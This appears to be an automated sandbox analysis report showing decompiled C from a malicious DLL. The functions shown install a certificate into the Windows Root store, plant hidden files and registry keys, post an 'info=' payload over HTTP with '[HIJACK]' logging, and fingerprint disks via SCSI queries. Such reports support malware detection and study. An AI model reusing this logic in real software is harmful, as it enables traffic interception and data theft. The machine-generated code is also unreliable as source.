                                                                                                                                                                  0x1001fbe0
                                                                                                                                                                  0x1001fbf4
                                                                                                                                                                  0x1001fbfc
                                                                                                                                                                  0x1001fbfe
                                                                                                                                                                  0x1001fc23
                                                                                                                                                                  0x1001fc2b
                                                                                                                                                                  0x1001fc2d
                                                                                                                                                                  0x1001fc4f
                                                                                                                                                                  0x1001fc4f
                                                                                                                                                                  0x1001fc2d
                                                                                                                                                                  0x1001fbfe
                                                                                                                                                                  0x1001fbe0
                                                                                                                                                                  0x1001fbbe
                                                                                                                                                                  0x1001fb9f
                                                                                                                                                                  0x1001fc62

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FAB8
                                                                                                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FACD
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FAE4
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FB01
                                                                                                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FB16
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FB2D
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FB4A
                                                                                                                                                                    • Part of subcall function 1001F9F0: _memset.LIBCMT ref: 1001FA0E
                                                                                                                                                                    • Part of subcall function 1001F9F0: _strcat_s.LIBCMT ref: 1001FA41
                                                                                                                                                                    • Part of subcall function 1001F9F0: _sprintf.LIBCMT ref: 1001FA68
                                                                                                                                                                    • Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7BE
                                                                                                                                                                    • Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F803
                                                                                                                                                                    • Part of subcall function 1001F780: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F813
                                                                                                                                                                    • Part of subcall function 1001F780: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F842
                                                                                                                                                                    • Part of subcall function 1001F780: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F861
                                                                                                                                                                    • Part of subcall function 1001F780: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F9D2
                                                                                                                                                                    • Part of subcall function 1001F780: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F9DC
                                                                                                                                                                  Strings
                                                                                                                                                                  • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB8B
                                                                                                                                                                  • \Microsoft\Windows\win_a.dat, xrefs: 1001FAD3
                                                                                                                                                                  • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB69
                                                                                                                                                                  • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FB1C
                                                                                                                                                                  • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FBCC
                                                                                                                                                                  • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FBEA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                                  • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                                  • API String ID: 475603772-4188859120
                                                                                                                                                                  • Opcode ID: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
                                                                                                                                                                  • Instruction ID: 4e31c407b2421ecadd55cccd68f5b7507d928531dec073e07e65c36de6934fcb
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
                                                                                                                                                                  • Instruction Fuzzy Hash: BF41577AA00108B7E704DAA0DC46FF9336CDB64344F404098FE1C9A182EB71EB848BA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100212F0, Relevance: 16.7, APIs: 11, Instructions: 232COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E100212F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
				char _v8;
				char _v12;
				char* _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				void* _t86;
				void* _t88;
				intOrPtr _t91;
				void* _t92;
				void* _t120;
				void* _t140;
				void* _t141;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_t192 = __esi;
				_t191 = __edi;
				_t141 = __ebx;
				_v32 = 0;
				_v20 = "https://";
				_v16 = "http://";
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				_v24 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_t86 = E10001A50(_a4, _v20);
				_t194 = _t193 + 8;
				if(_t86 != 0) {
					L2:
					_v8 = _a4;
					_t88 = E10001A50(_a4, _v20);
					_t195 = _t194 + 8;
					if(_t88 == 0) {
						 *_a8 = 0;
						_v8 = _v8 + 7;
						 *_a20 = 0x50;
					} else {
						 *_a8 = 1;
						_v8 = _v8 + 8;
						 *_a20 = 0x1bb;
					}
					_t91 = E10001A50(_v8, "/");
					_t196 = _t195 + 8;
					_v28 = _t91;
					if(_v28 == 0) {
						_t92 = E1000CAD0(_v8);
						_t196 = _t196 + 4;
						_v24 = _t92 + 1;
					} else {
						_v24 = _v28 - _v8 + 1;
					}
					 *_a12 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
					E1000CF80(_t191,  *_a12, 0, _v24);
					E1000D1F0(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
					_v28 = E10001A50(_v8, "/");
					if(_v28 == 0) {
						_v24 = 2;
						 *_a24 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
						E1000CF80(_t191,  *_a24, 0, _v24);
						E1000E2E0( *_a24, "/");
					} else {
						_v24 = E1000CAD0(_v8) - _v28 - _v8 + 1;
						 *_a24 = L1000CEAF(_t141, _v28 - _v8, _t191, _t192, _v24);
						E1000CF80(_t191,  *_a24, 0, _v24);
						E1000E2E0( *_a24, _v28);
					}
					_v8 = E10001A50( *_a12, ":");
					if(_v8 == 0) {
						_t181 = _a12;
						_v24 = E1000CAD0( *_a12) + 1;
					} else {
						_v24 = _v8 -  *_a12 + 1;
						_t120 = E1000CAD0( *_a12);
						_t181 =  &_v44;
						E1000D1F0(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
						E1000E645( &_v44, "%d", _a20);
					}
					 *_a16 = L1000CEAF(_t141, _t181, _t191, _t192, _v24);
					E1000CF80(_t191,  *_a16, 0, _v24);
					E1000D1F0(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
					_v32 = 1;
				} else {
					_t140 = E10001A50(_a4, _v16);
					_t194 = _t194 + 8;
					if(_t140 != 0) {
						goto L2;
					}
				}
				return _v32;
			}



























                                                                                                                                                                  0x100212f0
                                                                                                                                                                  0x100212f0
                                                                                                                                                                  0x100212f0
                                                                                                                                                                  0x100212f6
                                                                                                                                                                  0x100212fd
                                                                                                                                                                  0x10021304
                                                                                                                                                                  0x1002130b
                                                                                                                                                                  0x10021312
                                                                                                                                                                  0x10021319
                                                                                                                                                                  0x10021320
                                                                                                                                                                  0x10021327
                                                                                                                                                                  0x1002132d
                                                                                                                                                                  0x10021330
                                                                                                                                                                  0x10021333
                                                                                                                                                                  0x1002133e
                                                                                                                                                                  0x10021343
                                                                                                                                                                  0x10021348
                                                                                                                                                                  0x10021362
                                                                                                                                                                  0x10021365
                                                                                                                                                                  0x10021370
                                                                                                                                                                  0x10021375
                                                                                                                                                                  0x1002137a
                                                                                                                                                                  0x1002139c
                                                                                                                                                                  0x100213a8
                                                                                                                                                                  0x100213ae
                                                                                                                                                                  0x1002137c
                                                                                                                                                                  0x1002137f
                                                                                                                                                                  0x1002138b
                                                                                                                                                                  0x10021391
                                                                                                                                                                  0x10021391
                                                                                                                                                                  0x100213bd
                                                                                                                                                                  0x100213c2
                                                                                                                                                                  0x100213c5
                                                                                                                                                                  0x100213cc
                                                                                                                                                                  0x100213e0
                                                                                                                                                                  0x100213e5
                                                                                                                                                                  0x100213eb
                                                                                                                                                                  0x100213ce
                                                                                                                                                                  0x100213d7
                                                                                                                                                                  0x100213d7
                                                                                                                                                                  0x100213fd
                                                                                                                                                                  0x1002140b
                                                                                                                                                                  0x10021424
                                                                                                                                                                  0x1002143d
                                                                                                                                                                  0x10021444
                                                                                                                                                                  0x10021499
                                                                                                                                                                  0x100214af
                                                                                                                                                                  0x100214bd
                                                                                                                                                                  0x100214d0
                                                                                                                                                                  0x10021446
                                                                                                                                                                  0x1002145d
                                                                                                                                                                  0x1002146f
                                                                                                                                                                  0x1002147d
                                                                                                                                                                  0x1002148f
                                                                                                                                                                  0x10021494
                                                                                                                                                                  0x100214eb
                                                                                                                                                                  0x100214f2
                                                                                                                                                                  0x1002153e
                                                                                                                                                                  0x1002154f
                                                                                                                                                                  0x100214f4
                                                                                                                                                                  0x100214ff
                                                                                                                                                                  0x10021508
                                                                                                                                                                  0x1002151b
                                                                                                                                                                  0x1002151f
                                                                                                                                                                  0x10021534
                                                                                                                                                                  0x10021539
                                                                                                                                                                  0x10021561
                                                                                                                                                                  0x1002156f
                                                                                                                                                                  0x1002158a
                                                                                                                                                                  0x10021592
                                                                                                                                                                  0x1002134a
                                                                                                                                                                  0x10021352
                                                                                                                                                                  0x10021357
                                                                                                                                                                  0x1002135c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002135c
                                                                                                                                                                  0x1002159f

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3056589307-0
                                                                                                                                                                  • Opcode ID: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
                                                                                                                                                                  • Instruction ID: 4b51f2b05251f5ad84218d7a5ee60ac0fbdcfae77a21dec9d6b54221d6e01b8d
                                                                                                                                                                  • Opcode Fuzzy Hash: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
                                                                                                                                                                  • Instruction Fuzzy Hash: 82912BF9E00209EFDB04CFA4D981AEFB7B5EF48344F104568E905AB345E635EA14CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10022D00, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 174COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E10022D00(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v48;
				char _v76;
				char _v104;
				char _v132;
				intOrPtr _v136;
				char _v164;
				char _v192;
				char _v220;
				signed int _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				void* __ebp;
				intOrPtr _t77;
				void* _t109;
				void* _t110;
				void* _t113;
				intOrPtr _t154;
				intOrPtr _t157;
				void* _t160;
				void* _t164;

				_t164 = __eflags;
				_t156 = __esi;
				_t155 = __edi;
				_t114 = __ebx;
				_push(0xffffffff);
				_push(E100232E0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t157;
				_v224 = 0;
				_push(_a12);
				_push(0x4c);
				_push("post_info");
				E1001F230(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", PathFindFileNameA(".\\post_info.cpp"));
				_v48 = 0;
				_t77 = E10022530(__ebx, __edi, __esi, _t164, _a12);
				_t160 = _t157 - 0xe8 + 0x18;
				_v136 = _t77;
				E10001160( &_v132, _t164, 0x10025ca2);
				_v8 = 0;
				E10001160( &_v104, _t164, "info=");
				_v8 = 1;
				_v228 = E10001160( &_v164, _t164, _v136);
				_v232 = _v228;
				_v8 = 2;
				E10001A90( &_v104, _v232);
				_v8 = 1;
				E100011A0( &_v164);
				E10001160( &_v44, _t164, 0x10025ca3);
				_v8 = 3;
				E10001160( &_v76, _t164, 0x10025cb9);
				_v8 = 4;
				_v48 = 0;
				while(1) {
					_t165 = _v48 - 6;
					if(_v48 > 6) {
						break;
					}
					E100011C0( &_v132, 0x10025cba);
					_v236 = E10022710(_t114, _t155, _t156, _t165,  &_v192, _v48);
					_v240 = _v236;
					_v8 = 5;
					E10001A70( &_v132, _v240);
					_v8 = 4;
					E100011A0( &_v192);
					_v244 = E10001160( &_v220, _t165, _a8);
					_v248 = _v244;
					_v8 = 6;
					E10001A90( &_v132, _v248);
					_v8 = 4;
					E100011A0( &_v220);
					_push(E100011E0( &_v132));
					_push(0x61);
					_push("post_info");
					E1001F230(_t155, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
					E100011C0( &_v44, 0x10025cbb);
					E100011C0( &_v76, 0x10025cce);
					_t109 = E10001200( &_v104);
					_t110 = E100011E0( &_v104);
					E10021C30(_t114, _t155, _t156, _t165, 0, 0, 0, E100011E0( &_v132), 2, 1, 0, _t110, _t109, 0, 0, 0, 0, 0, 0,  &_v44,  &_v76);
					_t160 = _t160 + 0x60;
					_t113 = E10001200( &_v44);
					_t166 = _t113;
					if(_t113 == 0) {
						_t154 = _v48 + 1;
						__eflags = _t154;
						_v48 = _t154;
						continue;
					} else {
					}
					break;
				}
				_push(_v136);
				E1000CA40(_t114, _t155, _t156, _t166);
				E10001110(_a4, _t166,  &_v76);
				_v224 = _v224 | 0x00000001;
				_v8 = 3;
				E100011A0( &_v76);
				_v8 = 1;
				E100011A0( &_v44);
				_v8 = 0;
				E100011A0( &_v104);
				_v8 = 0xffffffff;
				E100011A0( &_v132);
				 *[fs:0x0] = _v16;
				return _a4;
			}






























                                                                                                                                                                  0x10022d00
                                                                                                                                                                  0x10022d00
                                                                                                                                                                  0x10022d00
                                                                                                                                                                  0x10022d00
                                                                                                                                                                  0x10022d03
                                                                                                                                                                  0x10022d05
                                                                                                                                                                  0x10022d10
                                                                                                                                                                  0x10022d11
                                                                                                                                                                  0x10022d1e
                                                                                                                                                                  0x10022d2b
                                                                                                                                                                  0x10022d2c
                                                                                                                                                                  0x10022d2e
                                                                                                                                                                  0x10022d44
                                                                                                                                                                  0x10022d4c
                                                                                                                                                                  0x10022d57
                                                                                                                                                                  0x10022d5c
                                                                                                                                                                  0x10022d5f
                                                                                                                                                                  0x10022d6d
                                                                                                                                                                  0x10022d72
                                                                                                                                                                  0x10022d81
                                                                                                                                                                  0x10022d86
                                                                                                                                                                  0x10022d9c
                                                                                                                                                                  0x10022da8
                                                                                                                                                                  0x10022dae
                                                                                                                                                                  0x10022dbc
                                                                                                                                                                  0x10022dc1
                                                                                                                                                                  0x10022dcb
                                                                                                                                                                  0x10022dd8
                                                                                                                                                                  0x10022ddd
                                                                                                                                                                  0x10022de9
                                                                                                                                                                  0x10022dee
                                                                                                                                                                  0x10022df2
                                                                                                                                                                  0x10022e04
                                                                                                                                                                  0x10022e04
                                                                                                                                                                  0x10022e08
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022e16
                                                                                                                                                                  0x10022e2e
                                                                                                                                                                  0x10022e3a
                                                                                                                                                                  0x10022e40
                                                                                                                                                                  0x10022e4e
                                                                                                                                                                  0x10022e53
                                                                                                                                                                  0x10022e5d
                                                                                                                                                                  0x10022e71
                                                                                                                                                                  0x10022e7d
                                                                                                                                                                  0x10022e83
                                                                                                                                                                  0x10022e91
                                                                                                                                                                  0x10022e96
                                                                                                                                                                  0x10022ea0
                                                                                                                                                                  0x10022ead
                                                                                                                                                                  0x10022eae
                                                                                                                                                                  0x10022eb0
                                                                                                                                                                  0x10022ec6
                                                                                                                                                                  0x10022ed6
                                                                                                                                                                  0x10022ee3
                                                                                                                                                                  0x10022eff
                                                                                                                                                                  0x10022f08
                                                                                                                                                                  0x10022f23
                                                                                                                                                                  0x10022f28
                                                                                                                                                                  0x10022f2e
                                                                                                                                                                  0x10022f33
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022dfe
                                                                                                                                                                  0x10022dfe
                                                                                                                                                                  0x10022e01
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022f37
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022f44
                                                                                                                                                                  0x10022f45
                                                                                                                                                                  0x10022f54
                                                                                                                                                                  0x10022f62
                                                                                                                                                                  0x10022f68
                                                                                                                                                                  0x10022f6f
                                                                                                                                                                  0x10022f74
                                                                                                                                                                  0x10022f7b
                                                                                                                                                                  0x10022f80
                                                                                                                                                                  0x10022f87
                                                                                                                                                                  0x10022f8c
                                                                                                                                                                  0x10022f96
                                                                                                                                                                  0x10022fa1
                                                                                                                                                                  0x10022fab

                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000004C,?), ref: 10022D38
                                                                                                                                                                    • Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
                                                                                                                                                                    • Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293
                                                                                                                                                                    • Part of subcall function 10022530: _memset.LIBCMT ref: 10022584
                                                                                                                                                                    • Part of subcall function 10022530: _strlen.LIBCMT ref: 100225B8
                                                                                                                                                                    • Part of subcall function 10022530: _memset.LIBCMT ref: 10022626
                                                                                                                                                                    • Part of subcall function 10022530: _strlen.LIBCMT ref: 10022632
                                                                                                                                                                    • Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
                                                                                                                                                                    • Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C
                                                                                                                                                                  • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$FileFindHttpNamePath_strlen$DebugLocalOpenOptionOutputStringTime
                                                                                                                                                                  • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                                  • API String ID: 2213638552-152146038
                                                                                                                                                                  • Opcode ID: 73bb963f22ba2c1732fff04cfbf30ba04fa5a5e8588cdd7c25535a6641d5ae82
                                                                                                                                                                  • Instruction ID: 8607acd66d3c23fd638f037442e906d60192c638072a9ab774b96db5fff67154
                                                                                                                                                                  • Opcode Fuzzy Hash: 73bb963f22ba2c1732fff04cfbf30ba04fa5a5e8588cdd7c25535a6641d5ae82
                                                                                                                                                                  • Instruction Fuzzy Hash: 57714E75D01248EBEB18DB94DD52BEEBB74EF18384F908098F60A77181EB712B45CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001D5C0, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E1001D5C0(void* __edi, char* _a4) {
				intOrPtr _v8;
				struct _OVERLAPPED* _v12;
				signed int _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				intOrPtr _v28;
				void* _v32;
				short _v548;
				char _v1010;
				char _v1068;
				char _v1070;
				intOrPtr _v1084;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				void _v1108;
				char _v2132;
				struct _OVERLAPPED* _v2136;
				char _v2137;
				long _v2144;
				struct _OVERLAPPED* _v2148;
				intOrPtr _v2152;
				char* _v2156;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t125;
				void* _t126;
				void* _t127;

				_t125 = __edi;
				_v20 = 0;
				_v2136 = 0;
				_v24 = 0;
				do {
					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
					_t127 = _t127 + 0xc;
					_v32 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0);
					if(_v32 != 0xffffffff) {
						_v12 = 0;
						while(1 != 0) {
							E1000CF80(_t125,  &_v1108, 0, 0x22d);
							_t127 = _t127 + 0xc;
							_v1104 = 0x49534353;
							_v1100 = 0x4b534944;
							_v1068 = _v12;
							_v1108 = 0x1c;
							_v1096 = 0x2710;
							_v1084 = 0x211;
							_v1092 = 0x1b0501;
							_v1070 = 0xec;
							if(DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0) == 0 || _v1010 == 0) {
								L20:
								if(_v2136 != 0) {
									L23:
								} else {
									_v12 =  &(_v12->Internal);
									if(_v12 < 2) {
										goto L23;
									} else {
										continue;
									}
								}
							} else {
								_v16 = 0;
								do {
									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
									_v16 = _v16 + 1;
								} while (_v16 < 0x100);
								_t91 = E1001CDD0( &_v2132);
								_t127 = _t127 + 4;
								_v28 = _t91;
								_v2148 = 0;
								_v8 = 0x104;
								_v2156 = _a4;
								_v2152 = _v28 - _a4;
								while(_v8 != 0x80000106) {
									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
									if(_v2137 != 0) {
										 *_v2156 = _v2137;
										_v2156 = _v2156 + 1;
										_t96 = _v8 - 1;
										_v8 = _t96;
										if(_t96 != 0) {
											continue;
										} else {
											L17:
											_v2156 = _v2156 - 1;
											_v2148 = 0x8007007a;
										}
									} else {
										break;
									}
									L18:
									 *_v2156 = 0;
									if(_v2148 < 0) {
										goto L20;
									} else {
										goto L24;
									}
									goto L25;
								}
								if(_v8 == 0) {
									goto L17;
								} else {
								}
								goto L18;
							}
							L25:
							CloseHandle(_v32);
							_v20 = _v24;
							goto L26;
						}
						L24:
						_v2136 = 1;
						goto L25;
					}
					L26:
					_v20 =  &(_v20->Internal);
					_v24 = _v20;
				} while (_v20 < 0x10);
				return _v2136;
			}
































                                                                                                                                                                  0x1001d5c0
                                                                                                                                                                  0x1001d5c9
                                                                                                                                                                  0x1001d5d0
                                                                                                                                                                  0x1001d5da
                                                                                                                                                                  0x1001d5e1
                                                                                                                                                                  0x1001d5f1
                                                                                                                                                                  0x1001d5f7
                                                                                                                                                                  0x1001d616
                                                                                                                                                                  0x1001d61d
                                                                                                                                                                  0x1001d623
                                                                                                                                                                  0x1001d62a
                                                                                                                                                                  0x1001d645
                                                                                                                                                                  0x1001d64a
                                                                                                                                                                  0x1001d64d
                                                                                                                                                                  0x1001d657
                                                                                                                                                                  0x1001d664
                                                                                                                                                                  0x1001d66a
                                                                                                                                                                  0x1001d674
                                                                                                                                                                  0x1001d67e
                                                                                                                                                                  0x1001d688
                                                                                                                                                                  0x1001d692
                                                                                                                                                                  0x1001d6c8
                                                                                                                                                                  0x1001d7ce
                                                                                                                                                                  0x1001d7d5
                                                                                                                                                                  0x1001d7ed
                                                                                                                                                                  0x1001d7d7
                                                                                                                                                                  0x1001d7e0
                                                                                                                                                                  0x1001d7e6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7e8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7e8
                                                                                                                                                                  0x1001d7e6
                                                                                                                                                                  0x1001d6dd
                                                                                                                                                                  0x1001d6dd
                                                                                                                                                                  0x1001d6e4
                                                                                                                                                                  0x1001d6f2
                                                                                                                                                                  0x1001d6ff
                                                                                                                                                                  0x1001d702
                                                                                                                                                                  0x1001d712
                                                                                                                                                                  0x1001d717
                                                                                                                                                                  0x1001d71a
                                                                                                                                                                  0x1001d71d
                                                                                                                                                                  0x1001d727
                                                                                                                                                                  0x1001d731
                                                                                                                                                                  0x1001d73d
                                                                                                                                                                  0x1001d743
                                                                                                                                                                  0x1001d75a
                                                                                                                                                                  0x1001d769
                                                                                                                                                                  0x1001d779
                                                                                                                                                                  0x1001d784
                                                                                                                                                                  0x1001d78d
                                                                                                                                                                  0x1001d790
                                                                                                                                                                  0x1001d793
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d795
                                                                                                                                                                  0x1001d7a1
                                                                                                                                                                  0x1001d7aa
                                                                                                                                                                  0x1001d7b0
                                                                                                                                                                  0x1001d7b0
                                                                                                                                                                  0x1001d76b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d76b
                                                                                                                                                                  0x1001d7ba
                                                                                                                                                                  0x1001d7c0
                                                                                                                                                                  0x1001d7ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7ca
                                                                                                                                                                  0x1001d79d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d79f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d79d
                                                                                                                                                                  0x1001d7fe
                                                                                                                                                                  0x1001d802
                                                                                                                                                                  0x1001d80b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d80b
                                                                                                                                                                  0x1001d7f4
                                                                                                                                                                  0x1001d7f4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d7f4
                                                                                                                                                                  0x1001d80e
                                                                                                                                                                  0x1001d814
                                                                                                                                                                  0x1001d81a
                                                                                                                                                                  0x1001d81d
                                                                                                                                                                  0x1001d830

                                                                                                                                                                  APIs
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001D5F1
                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D610
                                                                                                                                                                  • _memset.LIBCMT ref: 1001D645
                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 1001D6C0
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001D802
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
